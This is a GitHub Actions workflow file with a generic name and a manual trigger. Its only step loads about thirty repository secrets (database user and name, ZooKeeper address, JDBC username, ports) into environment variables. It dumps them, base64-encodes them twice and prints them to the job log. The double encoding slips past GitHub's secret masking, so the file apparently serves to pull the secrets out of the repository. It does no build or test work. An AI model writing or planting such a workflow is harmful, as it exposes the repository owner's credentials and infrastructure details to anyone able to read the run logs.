name: GitHub Actions
on:
  workflow_dispatch:
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_PINPOINT_ZOOKEEPER_ADDRESS: ${{ secrets.PINPOINT_ZOOKEEPER_ADDRESS }}
          secret_PINPOINT_HBASE_NAME: ${{ secrets.PINPOINT_HBASE_NAME }}
          secret_AGENTINFO_TTL: ${{ secrets.AGENTINFO_TTL }}
          secret_AGENTSTATV2_TTL: ${{ secrets.AGENTSTATV2_TTL }}
          secret_APPSTATAGGRE_TTL: ${{ secrets.APPSTATAGGRE_TTL }}
          secret_APPINDEX_TTL: ${{ secrets.APPINDEX_TTL }}
          secret_AGENTLIFECYCLE_TTL: ${{ secrets.AGENTLIFECYCLE_TTL }}
          secret_AGENTEVENT_TTL: ${{ secrets.AGENTEVENT_TTL }}
          secret_STRINGMETADATA_TTL: ${{ secrets.STRINGMETADATA_TTL }}
          secret_APIMETADATA_TTL: ${{ secrets.APIMETADATA_TTL }}
          secret_SQLMETADATA_TTL: ${{ secrets.SQLMETADATA_TTL }}
          secret_TRACEV2_TTL: ${{ secrets.TRACEV2_TTL }}
          secret_APPTRACEINDEX_TTL: ${{ secrets.APPTRACEINDEX_TTL }}
          secret_APPMAPSTATCALLERV2_TTL: ${{ secrets.APPMAPSTATCALLERV2_TTL }}
          secret_APPMAPSTATCALLEV2_TTL: ${{ secrets.APPMAPSTATCALLEV2_TTL }}
          secret_APPMAPSTATSELFV2_TTL: ${{ secrets.APPMAPSTATSELFV2_TTL }}
          secret_HOSTAPPMAPV2_TTL: ${{ secrets.HOSTAPPMAPV2_TTL }}
          secret_MYSQL_USER: ${{ secrets.MYSQL_USER }}
          secret_MYSQL_DATABASE: ${{ secrets.MYSQL_DATABASE }}
          secret_PINPOINT_WEB_NAME: ${{ secrets.PINPOINT_WEB_NAME }}
          secret_WEB_SERVER_PORT: ${{ secrets.WEB_SERVER_PORT }}
          secret_WEB_LOGGING_LEVEL_ROOT: ${{ secrets.WEB_LOGGING_LEVEL_ROOT }}
          secret_CLUSTER_ENABLE: ${{ secrets.CLUSTER_ENABLE }}
          secret_CONFIG_SENDUSAGE: ${{ secrets.CONFIG_SENDUSAGE }}
          secret_CONFIG_SHOW_APPLICATIONSTAT: ${{ secrets.CONFIG_SHOW_APPLICATIONSTAT }}
          secret_JDBC_DRIVERCLASSNAME: ${{ secrets.JDBC_DRIVERCLASSNAME }}
          secret_JDBC_USERNAME: ${{ secrets.JDBC_USERNAME }}
          secret_PINPOINT_COLLECTOR_NAME: ${{ secrets.PINPOINT_COLLECTOR_NAME }}
          secret_COLLECTOR_LOGGING_LEVEL_ROOT: ${{ secrets.COLLECTOR_LOGGING_LEVEL_ROOT }}
          secret_COLLECTOR_RECEIVER_GRPC_AGENT_PORT: ${{ secrets.COLLECTOR_RECEIVER_GRPC_AGENT_PORT }}
